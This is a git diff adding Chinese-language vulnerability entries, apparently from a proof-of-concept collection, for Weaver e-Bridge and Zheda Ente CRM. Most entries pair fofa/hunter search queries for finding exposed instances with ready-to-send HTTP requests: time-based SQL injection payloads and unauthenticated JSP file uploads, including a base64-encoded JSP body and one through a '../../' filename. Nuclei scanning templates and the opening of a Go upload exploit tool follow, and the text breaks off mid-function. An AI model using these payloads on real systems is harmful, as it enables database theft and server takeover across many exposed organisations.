+++ b/泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md 
@@ -0,0 +1,21 @@ +# 泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞 +泛微云桥e-Bridge 是一款办公自动化工具,主要提供文档管理、流程管理、协同办公、知识管理和移动办公等功能。它的目标是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该产品 checkMobile接口存在SQL注入漏洞,通过此漏洞攻击者可获取企业数据库敏感数据。 + +## fofa +```javascript +app="泛微-云桥e-Bridge" +``` + +## poc +```javascript +POST /taste/checkMobile?company=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX&openid=1&source=1&userName=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +Accept: */* +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734314946886-bc51d38e-16bd-4416-aa8c-56e40e24692a.png) + diff --git a/泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md b/泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md new file mode 100644 index 0000000..e824e2a --- /dev/null +++ b/泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md @@ -0,0 +1,28 @@ +# 泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞 + +泛微云桥e-Bridge是在“互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成平台。 + +泛微-云桥e-Bridge addTasteJsonp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +app="泛微云桥e-Bridge" +``` + +## poc + +```javascript +GET /taste/addTasteJsonp?company=1&userName=1&jsonpcallback=1&mobile=1%27+AND+%28SELECT+6488+FROM+%28SELECT%28SLEEP%285%29%29%29CvMg%29+OR+%27JmLq%27%3D%27IpuI HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191452651.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Ej26hywx4po4sj3dSAVI_Q \ No newline at end of file 
diff --git a/浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md b/浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md new file mode 100644 index 0000000..445ac45 --- /dev/null +++ b/浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md @@ -0,0 +1,37 @@ +# 浙大恩特CRM AuthorityJudgement存在SQL注入漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM AuthorityJudgement存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感数据。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/9XAMe8BW3nTA1LAk/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-642664.png) + +# 四、漏洞复现 +```java +POST /entsoft/PurchaseAction.entphone;.png?method=AuthorityJudgement HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 34 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +modNum=1';WAITFOR DELAY '0:0:1'--+ +``` + +![1708515727567-73b86e53-cf50-4d3c-910e-e34dd603d2b2.png](./img/9XAMe8BW3nTA1LAk/1708515727567-73b86e53-cf50-4d3c-910e-e34dd603d2b2-798665.png) + +[浙大恩特客户资源管理系统-purchaseaction-entphone--sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145208-7476e5e1-74ce-47c8-9fb1-8d44ebeec9ac.yaml) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMFollowAction存在SQL注入漏洞.md b/浙大恩特CRMFollowAction存在SQL注入漏洞.md new file mode 100644 index 0000000..32206b7 --- /dev/null +++ b/浙大恩特CRMFollowAction存在SQL注入漏洞.md 
@@ -0,0 +1,36 @@ +# 浙大恩特CRM FollowAction存在SQL注入漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM FollowAction存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感数据。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/m19IpcWC3G3B53u5/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-838671.png) + +# 四、漏洞复现 +```plain +POST /entsoft/FollowAction.entphone;.js HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Connection: close +Content-Length: 72 +Accept: */* +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +method=updreadFlg&trk_id=a&readFlag=a%27;WAITFOR%20DELAY%20%270:0:3%27-- +``` + +![1708235641244-6376c3c0-87fe-47a6-bad0-3b0b2f987767.png](./img/m19IpcWC3G3B53u5/1708235641244-6376c3c0-87fe-47a6-bad0-3b0b2f987767-860254.png) + +[浙大恩特客户资源管理系统-followaction-entphone--sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145263-d49b26ed-4e41-4352-b174-82a892d4332e.yaml) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMT0140_editActionSQL注入漏洞.md b/浙大恩特CRMT0140_editActionSQL注入漏洞.md new file mode 100644 index 0000000..6945959 --- /dev/null +++ b/浙大恩特CRMT0140_editActionSQL注入漏洞.md 
@@ -0,0 +1,45 @@ +# 浙大恩特CRM T0140_editAction SQL注入漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM T0140_editAction 存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/f1wXP9KnVWY_4fwQ/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-053269.png) + +# 四、漏洞复现 +```plain +GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';waitfor+delay+'0:0:5'-- HTTP/1.1 +Host: xx.xx.xx.xx +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![1700315256759-7e924cad-9094-47c7-a60b-487d3bfd9a64.png](./img/f1wXP9KnVWY_4fwQ/1700315256759-7e924cad-9094-47c7-a60b-487d3bfd9a64-902360.png) + +sqlmap + +```plain +GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1 HTTP/1.1 +Host: xx.xx.xx.xx +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![1700315422038-72774add-b8ed-4117-befd-062ca7dd8bbb.png](./img/f1wXP9KnVWY_4fwQ/1700315422038-72774add-b8ed-4117-befd-062ca7dd8bbb-897323.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMfileupload.jsp任意文件上传漏洞.md b/浙大恩特CRMfileupload.jsp任意文件上传漏洞.md new file mode 100644 index 0000000..c76fe51 --- /dev/null 
+++ b/浙大恩特CRMfileupload.jsp任意文件上传漏洞.md @@ -0,0 +1,46 @@ +# 浙大恩特CRM fileupload.jsp 任意文件上传漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM fileupload.jsp存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/MNKDc3hnljdTlvOE/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-154874.png) + +# 四、漏洞复现 +```plain +POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=123123.jsp HTTP/1.1 +Host: xx.xx.xx.xx +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=2511BA8347F6BD511B037A4B0C40DDE3; JSESSIONID=17BAFD608E509D1C96AF5715B9C0C235 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 4 + +test +``` + +![1700146846618-56989d7b-0142-47ed-ba9c-3b4e5ce5728d.png](./img/MNKDc3hnljdTlvOE/1700146846618-56989d7b-0142-47ed-ba9c-3b4e5ce5728d-919392.png) + +上传文件位置 + +```plain + /enterdoc/uploadfile/123123.jsp +``` + +![1700146879660-7bc87d16-6df6-426a-ae19-fce2cb505006.png](./img/MNKDc3hnljdTlvOE/1700146879660-7bc87d16-6df6-426a-ae19-fce2cb505006-245853.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMloadFile任意文件上传漏洞.md b/浙大恩特CRMloadFile任意文件上传漏洞.md new file mode 100644 index 0000000..bdb9792 --- /dev/null +++ b/浙大恩特CRMloadFile任意文件上传漏洞.md 
@@ -0,0 +1,48 @@ +# 浙大恩特CRM loadFile任意文件上传漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM loadFile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/-A0quRyHPliStmt2/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-135267.png) + +# 四、漏洞复现 +```plain +POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Length: 203 + +------WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Disposition: form-data; name="file";filename="as.jsp" +Content-Type: image/jpeg + +<%out.print("test");%> +------WebKitFormBoundarye8FPHsIAq9JN8j2A-- +``` + +![1700034671160-eec58ac8-f06c-4a3d-ab89-760a691e1eb2.png](./img/-A0quRyHPliStmt2/1700034671160-eec58ac8-f06c-4a3d-ab89-760a691e1eb2-488996.png) + +根据响应可知上传文件位置 + +```plain + /enterdoc/gesnum/00003509/photo/as.jsp +``` + +![1700034711122-37b79faa-ab5b-4d49-88d2-1a76bab4f5a7.png](./img/-A0quRyHPliStmt2/1700034711122-37b79faa-ab5b-4d49-88d2-1a76bab4f5a7-729649.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMmachord_doc任意文件上传漏洞.md b/浙大恩特CRMmachord_doc任意文件上传漏洞.md new file mode 100644 index 0000000..ec3c957 --- /dev/null +++ b/浙大恩特CRMmachord_doc任意文件上传漏洞.md 
@@ -0,0 +1,66 @@ +# 浙大恩特CRM machord_doc任意文件上传漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM machord_doc存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/nhFAeXcr4y8xhjuV/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-756266.png) + +# 四、漏洞复现 +```plain +POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum&fileName=stc.jsp&strAffixStr&oprfilenam=null&gesnum HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 575 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="oprfilenam" + +null +--00content0boundary00 +Content-Disposition: form-data; name="uploadflg" + +0 +--00content0boundary00 +Content-Disposition: form-data; name="strAffixStr" + + +--00content0boundary00 +Content-Disposition: form-data; name="selfilenam" + + +--00content0boundary00 +Content-Disposition: form-data; name="uploadfile"; filename="stc.jsp" +Content-Type: image/png + +<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> +--00content0boundary00-- +``` + +![1706508362663-ac7d958a-027b-4f36-9e67-183cc0b2540e.png](./img/nhFAeXcr4y8xhjuV/1706508362663-ac7d958a-027b-4f36-9e67-183cc0b2540e-024310.png) + +上传文件位置 + +```plain +GET /enterdoc/Machord/stc.jsp HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + 
+![1706508460084-9c5cdce9-bc55-4c59-b11d-dab02bb03a17.png](./img/nhFAeXcr4y8xhjuV/1706508460084-9c5cdce9-bc55-4c59-b11d-dab02bb03a17-109299.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMsaveAttaFile任意文件上传漏洞.md b/浙大恩特CRMsaveAttaFile任意文件上传漏洞.md new file mode 100644 index 0000000..615243d --- /dev/null +++ b/浙大恩特CRMsaveAttaFile任意文件上传漏洞.md 
@@ -0,0 +1,48 @@ +# 浙大恩特CRM saveAttaFile任意文件上传漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM saveAttaFile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/oovIHLC9eb_VVrHx/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-785075.png) + +# 四、漏洞复现 +```plain +POST /entsoft/MailAction.entphone;.js?act=saveAttaFile HTTP/1.1 +Host: xx.xx.xx.xx +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Length: 179 + +------WebKitFormBoundarye8FPHsIAq9JN8j2A +Content-Disposition: form-data; name="file";filename="stc.jsp" +Content-Type: image/jpeg + +stc +------WebKitFormBoundarye8FPHsIAq9JN8j2A-- +``` + +![1700315054770-73ab7304-cc2e-4a4a-9440-9b8d3e075afe.png](./img/oovIHLC9eb_VVrHx/1700315054770-73ab7304-cc2e-4a4a-9440-9b8d3e075afe-202530.png) + +根据响应获取上传文件位置 + +```plain +/enterdoc/EnterMail/20231118/2023111821425069561254581/stc.jsp +``` + +![1700315092549-a07f0b64-c27f-4a23-8e23-a5e4f23e6e8e.png](./img/oovIHLC9eb_VVrHx/1700315092549-a07f0b64-c27f-4a23-8e23-a5e4f23e6e8e-514982.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md b/浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md new file mode 100644 index 0000000..5d173d5 --- /dev/null +++ b/浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md 
@@ -0,0 +1,55 @@ +# 浙大恩特CRM saveFileByPhone任意文件上传漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM saveFileByPhone存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/m5SQOJdEFI4o4V07/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-943390.png) + +# 四、漏洞复现 +```java +POST /entsoft/ProductAction.entphone;.js?method=saveFileByPhone&goonum=954572337&filename=usnw9.jsp&imageData=Ijwlb3V0LnByaW50KDEyNTQxMjU2Mik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiI= HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +Content-Length: 4 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +test +``` + +![1703401674950-b3f8a679-e77e-4c9e-bf22-6a23f8f5fdd5.png](./img/m5SQOJdEFI4o4V07/1703401674950-b3f8a679-e77e-4c9e-bf22-6a23f8f5fdd5-885837.png) + +```java +Ijwlb3V0LnByaW50KDEyNTQxMjU2Mik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiI= +``` + +![1703401771766-b3589322-1fb9-4c79-86d3-a6d5e357d028.png](./img/m5SQOJdEFI4o4V07/1703401771766-b3589322-1fb9-4c79-86d3-a6d5e357d028-381143.png) + +上传文件位置 + +```java +/entsoft/image/goocodimg/goodoc/954572337/usnw9.jsp;.js +``` + +![1703401707921-384444ad-1b9e-4257-974f-61b976f5bb4d.png](./img/m5SQOJdEFI4o4V07/1703401707921-384444ad-1b9e-4257-974f-61b976f5bb4d-650115.png) + +nuclei脚本 + 
+[浙大恩特客户资源管理系统-productaction-entphone--任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145337-f07f5255-5e64-4561-a65f-567e7b6375d4.yaml) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特CRMzipFileUpload任意文件上传漏洞.md b/浙大恩特CRMzipFileUpload任意文件上传漏洞.md new file mode 100644 index 0000000..5522ea5 --- /dev/null +++ b/浙大恩特CRMzipFileUpload任意文件上传漏洞.md 
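Review bot: the second fenced block in 四、漏洞复现 repeats the `imageData=` base64 value verbatim with no caption; either say what it is (the base64 of the uploaded file body, which the screenshot is meant to show) or drop the block. All three fences in this file are tagged `java` although they hold an HTTP request, a base64 string and a path; use `plain` as the sibling entries do.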
@@ -0,0 +1,50 @@ +# 浙大恩特CRM zipFileUpload任意文件上传漏洞 + +# 一、漏洞简介 +浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理(CRM)系统。该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。浙大恩特CRM zipFileUpload任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 浙大恩特CRM + +# 三、资产测绘 ++ hunter`app.name="浙大恩特 CRM"` ++ 特征 + +![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/okHuxnU_FN0k5qU4/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-432544.png) + +# 四、漏洞复现 +```java +POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 260 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="../../stc.jsp" +Content-Type: application/zip + +<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> +--00content0boundary00-- +``` + +![1704943891516-566c0363-ef56-4bad-b296-055023951a79.png](./img/okHuxnU_FN0k5qU4/1704943891516-566c0363-ef56-4bad-b296-055023951a79-284623.png) + +根据回显拼接上传文件位置 + +```java +/enterdoc/dao/2024011111284104541134657/stc.jsp +``` + +![1704943976538-ac2f6799-9ce4-41dd-b52a-2c7a0d7fc29a.png](./img/okHuxnU_FN0k5qU4/1704943976538-ac2f6799-9ce4-41dd-b52a-2c7a0d7fc29a-011387.png) + +[zhedaente-entsoft-fileupload-CrmBasicAction.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145291-128bd578-1b6b-45b2-9d79-58ca0ab390b2.yaml) + + + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md b/浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md new file mode 100644 index 0000000..bf890f2 --- /dev/null +++ b/浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md 
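Review bot: the 漏洞简介 sentence "浙大恩特CRM zipFileUpload任意文件上传漏洞,攻击者可通过该漏洞..." is missing the verb 存在 that every sibling entry uses. The PoC also depends on `filename="../../stc.jsp"`, i.e. directory traversal in the multipart filename, which the description does not mention; say so, because a reader checking a fix needs to know that both the extension check and path normalisation are involved.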
@@ -0,0 +1,240 @@ +## 浙大恩特客户资源管理系统 文件上传和sql注入漏洞 + +## 特征 +``` +app.name="浙大恩特 CRM" +app="浙大恩特客户资源管理系统" +``` + +## SQL注入 +```yaml +id: enter-T0140_editAction-api-sqli + +info: + name: 浙大恩特客户资源管理系统T0140_editAction.entweb;.js接口sql注入漏洞 + author: YGnight + severity: high + description: description + reference: + - https:// + metadata: + verified: true + max-request: 1 + fofa-query: app="浙大恩特客户资源管理系统" + + +requests: + - raw: + - |+ + GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate, br + Connection: close + Cookie: JSESSIONID=1DAEEF5E703FF40871BD44A67C1EEDD5; JSESSIONID=2C6DAAA80F315B114CD65C9DA80D8D8C + Upgrade-Insecure-Requests: 1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '0' + +``` + +## 文件上传1 +```yaml +id: enter-machord_doc-api-fileupload + +info: + name: 浙大恩特客户资源管理系统machord_doc.jsp;.js接口任意文件上传 + author: YGnight + severity: high + description: description + reference: + - https:// + metadata: + verified: true + max-request: 1 + fofa-query: app="浙大恩特客户资源管理系统" + + +requests: + - raw: + - |- + POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=night.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Connection: close + Content-Type: multipart/form-data; boundary=----4225820000370152680749129212 
+ Content-Length: 548 + + ------4225820000370152680749129212 + Content-Disposition: form-data; name="oprfilenam" + + null + ------4225820000370152680749129212 + Content-Disposition: form-data; name="uploadflg" + + 0 + ------4225820000370152680749129212 + Content-Disposition: form-data; name="strAffixStr" + + + ------4225820000370152680749129212 + Content-Disposition: form-data; name="selfilenam" + + + ------4225820000370152680749129212 + Content-Disposition: form-data; name="uploadfile"; filename="night.jsp" + Content-Type: image/png + + night + ------4225820000370152680749129212-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'night.jsp' +``` + +## 文件上传2 +```go +package main + +import ( + "bytes" + "crypto/md5" + "crypto/tls" + "encoding/json" + "fmt" + "github.com/hpifu/go-kit/hflag" + "github.com/liushuochen/gotable" + "github.com/thanhpk/randstr" + "io/ioutil" + "mime/multipart" + "net/http" + "os" + "strings" + "time" +) + +type Resutl struct { + VisitRoot string `json:"visitRoot"` + FileName string `json:"fileName"` + Path string `json:"path"` + IsImage bool `json:"isImage"` + Msg string `json:"msg"` +} + +func main() { + context, password, key := 